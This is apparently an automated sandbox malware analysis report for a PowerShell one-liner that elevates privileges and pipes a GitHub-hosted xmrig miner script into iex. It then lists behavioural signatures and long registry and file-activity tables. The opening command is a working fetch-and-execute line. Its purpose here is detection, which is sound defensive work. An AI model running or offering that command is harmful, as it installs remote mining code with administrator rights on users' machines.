Analysis Overview
Threat Level: Known bad
The file http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex was found to be: Known bad.
Malicious Activity Summary
Cobaltstrike
Cobalt Strike reflective loader
Checks for common network interception software
Downloads MZ/PE file
Stops running service(s)
Command and Scripting Interpreter: PowerShell
Contacts a large (531) amount of remote hosts
Drops file in Drivers directory
Manipulates Digital Signatures
Creates new service(s)
Modifies Windows Firewall
Possible privilege escalation attempt
Loads dropped DLL
Event Triggered Execution: Component Object Model Hijacking
Reads user/profile data of web browsers
Executes dropped EXE
Checks BIOS information in registry
Modifies file permissions
Checks computer location settings
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Writes to the Master Boot Record (MBR)
Checks whether UAC is enabled
Modifies powershell logging option
Checks installed software on the system
Enumerates connected drives
Drops file in System32 directory
Checks system information in the registry
AutoIT Executable
Drops file in Program Files directory
Launches sc.exe
Drops file in Windows directory
Enumerates physical storage devices
Access Token Manipulation: Create Process with Token
Program crash
Event Triggered Execution: Netsh Helper DLL
NSIS installer
Suspicious use of SetWindowsHookEx
Uses Volume Shadow Copy service COM API
Modifies Internet Explorer settings
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SendNotifyMessage
Script User-Agent
Suspicious behavior: AddClipboardFormatListener
Suspicious use of AdjustPrivilegeToken
Modifies system certificate store
Checks processor information in registry
Runs net.exe
Modifies data under HKEY_USERS
Uses Task Scheduler COM API
Checks SCSI registry key(s)
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
NTFS ADS
Enumerates system info in registry
Modifies registry class
Suspicious behavior: LoadsDriver
Suspicious behavior: EnumeratesProcesses
Enumerates processes with tasklist
Kills process with taskkill
Uses Volume Shadow Copy WMI provider
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-30 03:17
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-30 03:17
Reported
2024-06-30 03:47
Platform
win10v2004-20240611-en
Max time kernel
1800s
Max time network
1802s
Command Line
Signatures
Cobalt Strike reflective loader
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Cobaltstrike
Checks for common network interception software
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Contacts a large (531) amount of remote hosts
Creates new service(s)
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\drivers\rsElam.sys | C:\Users\Admin\AppData\Local\Temp\7zS0779229A\UnifiedStub-installer.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\SETE517.tmp | C:\Program Files\Npcap\NPFInstall.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\SETE517.tmp | C:\Program Files\Npcap\NPFInstall.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\npcap.sys | C:\Program Files\Npcap\NPFInstall.exe | N/A |
| File created | C:\Windows\system32\drivers\rsCamFilter020502.sys | C:\Users\Admin\AppData\Local\Temp\7zS0779229A\UnifiedStub-installer.exe | N/A |
| File created | C:\Windows\system32\drivers\rsKernelEngine.sys | C:\Users\Admin\AppData\Local\Temp\7zS0779229A\UnifiedStub-installer.exe | N/A |
| File created | C:\Windows\system32\drivers\rsElam.sys | C:\Users\Admin\AppData\Local\Temp\7zS0779229A\UnifiedStub-installer.exe | N/A |
Manipulates Digital Signatures
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Cleanup\{FC451C16-AC75-11D1-B4B8-00C04FB66EA0}\$DLL = "WINTRUST.DLL" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.11\FuncName = "WVTAsn1SpcStatementTypeDecode" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Certificate\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}\$DLL = "WINTRUST.DLL" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Message\{C6B2E8D0-E005-11CF-A134-00C04FD7BF43}\$Function = "SoftpubLoadMessage" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2221\FuncName = "WVTAsn1CatNameValueEncode" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{C689AABA-8E78-11D0-8C47-00C04FC295EE}\FuncName = "CryptSIPPutSignedDataMsg" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{9BA61D3F-E73A-11D0-8CD2-00C04FC295EE}\FuncName = "CryptSIPRemoveSignedDataMsg" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Certificate\{573E31F8-DDBA-11D0-8CCB-00C04FC295EE}\$Function = "WintrustCertificateTrust" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Usages\1.3.6.1.5.5.7.3.1\$DLL = "WINTRUST.DLL" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.4.3\FuncName = "WVTAsn1SealingSignatureAttributeDecode" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{C689AABA-8E78-11D0-8C47-00C04FC295EE}\FuncName = "CryptSIPRemoveSignedDataMsg" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{7801EBD0-CF4B-11D0-851F-0060979387EA}\$DLL = "Cryptdlg.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\60EE3FC53D4BDFD1697AE5BEAE1CAB1C0F3AD4E3\Blob = 0f0000000100000020000000eec58131dc11cd7f512501b15fdbc6074c603b68ca91f7162d5a042054edb0cf03000000010000001400000060ee3fc53d4bdfd1697ae5beae1cab1c0f3ad4e32000000001000000c0060000308206bc308205a4a003020102021003f1b4e15f3a82f1149678b3d7d8475c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3132303431383132303030305a170d3237303431383132303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e672043412028534841322930820122300d06092a864886f70d01010105000382010f003082010a0282010100a753fa0fb2b513f164cf8480fcae8035d1b6d7c7a32cac1a2cacf184ac3a35123a9291ba57e4c4c9f32fa8483cb7d66edc9722ba517961af432f0db79bb44931ae44583ea4a196a7874f237ec36c652490553ea1ca237cc542e9c47a62459b7dde6374cb9e6325f8849a9aad454fae7d1fc813cb759bc9e1e18af80b0c98f4ca3ed045aa7a1ea558933634be2b2e2b315866b432109f9df052a1efe83ed376f2405adcfa6a3d1b4bad76b08c5cee36ba83ea30a84cdef10b2a584188ae0089ab03d11682202276eb5e54381262e1d27024dbed1f70d26409802de2b69dce1ff2bb21f36cdbd8b3197b8a509fefec360a5c9ab74ad308a03979fdddbf3d3a09250203010001a38203583082035430120603551d130101ff040830060101ff020100300e0603551d0f0101ff04040302018630130603551d25040c300a06082b06010505070303307f06082b0601050507010104733071302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304906082b06010505073002863d687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274486967684173737572616e63654556526f6f7443412e63727430818f0603551d1f0481873081843040a03ea03c863a687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274486967684173737572616e63654556526f6f7443412e63726c3040a03ea03c863a687474703a2f2f63726c342e64696769636572742e636f6d2f4469676943657274486967684173737572616e63654556526f6f7443412e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0302308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e301d0603551d0e041604148fe87ef06d326a000523c770976a3a90ff6bead4301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d01010b0500038201010019334a0c813337dbad36c9e4c93abbb51b2e7aa2e2f44342179ebf4ea14de1b1dbe981dd9f01f2e488d5e9fe09fd21c1ec5d80d2f0d6c143c2fe772bdbf9d79133ce6cd5b2193be62ed6c9934f88408ecde1f57ef10fc6595672e8eb6a41bd1cd546d57c49ca663815c1bfe091707787dcc98d31c90c29a233ed8de287cd898d3f1bffd5e01a978b7cda6dfba8c6b23a666b7b01b3cdd8a634ec1201ab9558a5c45357a860e6e70212a0b92364a24dbb7c81256421becfee42184397bba53706af4dff26a54d614bec4641b865ceb8799e08960b818c8a3b8fc7998ca32a6e986d5e61c696b78ab9612d93b8eb0e0443d7f5fea6f062d4996aa5c1c1f0649480 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Certificate\{64B9D180-8DA2-11CF-8736-00AA00A485EB}\$DLL = "WINTRUST.DLL" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Signature\{189A3842-3041-11D1-85E1-00C04FC295EE}\$DLL = "WINTRUST.DLL" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2010\Dll = "WINTRUST.DLL" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Usages\1.3.6.1.5.5.7.3.1\DefaultId = "{573E31F8-AABA-11D0-8CCB-00C04FC295EE}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Signature\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\$DLL = "WINTRUST.DLL" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\CertCheck\{FC451C16-AC75-11D1-B4B8-00C04FB66EA0}\$DLL = "WINTRUST.DLL" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{DE351A43-8E59-11D0-8C47-00C04FC295EE}\FuncName = "CryptSIPVerifyIndirectData" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Initialization\{C6B2E8D0-E005-11CF-A134-00C04FD7BF43}\$DLL = "WINTRUST.DLL" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Usages\1.3.6.1.5.5.7.3.2\CallbackFreeFunction = "SoftpubFreeDefUsageCallData" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Initialization\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\$DLL = "WINTRUST.DLL" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2000\Dll = "WINTRUST.DLL" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2010\FuncName = "WVTAsn1IntentToSealAttributeDecode" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}\$DLL = "WINTRUST.DLL" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Message\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}\$DLL = "WINTRUST.DLL" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Usages\1.3.6.1.5.5.7.3.1\CallbackAllocFunction = "SoftpubLoadDefUsageCallData" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\$Function = "DriverFinalPolicy" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Usages\2.16.840.1.113730.4.1\$DLL = "WINTRUST.DLL" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}\$Function = "HTTPSFinalProv" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.4.3\Dll = "WINTRUST.DLL" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Certificate\{7801EBD0-CF4B-11D0-851F-0060979387EA}\$Function = "WintrustCertificateTrust" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2222\FuncName = "WVTAsn1CatMemberInfoDecode" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{DE351A43-8E59-11D0-8C47-00C04FC295EE}\Dll = "WINTRUST.DLL" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Usages\1.3.6.1.5.5.7.3.3\DefaultId = "{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Certificate\{C6B2E8D0-E005-11CF-A134-00C04FD7BF43}\$Function = "WintrustCertificateTrust" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.4.2\Dll = "WINTRUST.DLL" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Signature\{189A3842-3041-11D1-85E1-00C04FC295EE}\$DLL = "WINTRUST.DLL" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}\FuncName = "CryptSIPRemoveSignedDataMsg" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllFormatObject\1.3.6.1.5.5.7.3.4\Dll = "cryptdlg.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\CertCheck\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}\$Function = "SoftpubCheckCert" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Usages\1.3.6.1.4.1.311.10.3.3\CallbackAllocFunction = "SoftpubLoadDefUsageCallData" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\CertCheck\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}\$Function = "SoftpubCheckCert" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Usages\2.16.840.1.113730.4.1\CallbackAllocFunction = "SoftpubLoadDefUsageCallData" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2221\Dll = "WINTRUST.DLL" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\CertCheck\{189A3842-3041-11D1-85E1-00C04FC295EE}\$Function = "SoftpubCheckCert" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{C689AABA-8E78-11D0-8C47-00C04FC295EE}\Dll = "WINTRUST.DLL" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{C689AABA-8E78-11D0-8C47-00C04FC295EE}\Dll = "WINTRUST.DLL" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{DE351A43-8E59-11D0-8C47-00C04FC295EE}\Dll = "WINTRUST.DLL" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2006\FuncName = "WVTAsn1SpcStatementTypeEncode" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.20\FuncName = "WVTAsn1SpcLinkDecode" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{573E31F8-DDBA-11D0-8CCB-00C04FC295EE}\$Function = "SoftpubAuthenticode" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2007\Dll = "WINTRUST.DLL" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Certificate\{7801EBD0-CF4B-11D0-851F-0060979387EA}\$DLL = "WINTRUST.DLL" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Message\{FC451C16-AC75-11D1-B4B8-00C04FB66EA0}\$DLL = "WINTRUST.DLL" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.15\Dll = "WINTRUST.DLL" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2003\FuncName = "WVTAsn1SpcIndirectDataContentEncode" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.15\FuncName = "WVTAsn1SpcPeImageDataDecode" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2001\Dll = "WINTRUST.DLL" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.27\Dll = "WINTRUST.DLL" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Message\{FC451C16-AC75-11D1-B4B8-00C04FB66EA0}\$Function = "SoftpubLoadMessage" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Initialization\{C6B2E8D0-E005-11CF-A134-00C04FD7BF43}\$DLL = "WINTRUST.DLL" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}\$DLL = "WINTRUST.DLL" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\netsh.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\netsh.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-LFFGT.tmp\smartgaga-android-emulator-1.1.646.1-installer_pD-oKg1.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-K0IBL.tmp\component0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | C:\Program Files\McAfee\WebAdvisor\UIHost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | F:\BlueStacks X\BlueStacksWeb.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\BlueStacksSetup\BlueStacksInstaller_5.14.22.1003_native_e0175934c4a0a56f1db683585ffd1bcf.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\AnyDesk.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\Bootstrapper.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Programs\bluestacks-services\BlueStacksServices.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | C:\Program Files\ReasonLabs\Common\Client\v1.4.2\rsAppUI.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | F:\LDPlayer\LDPlayer9\dnuninst.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS0CE5F193\BlueStacksInstaller.exe | N/A |
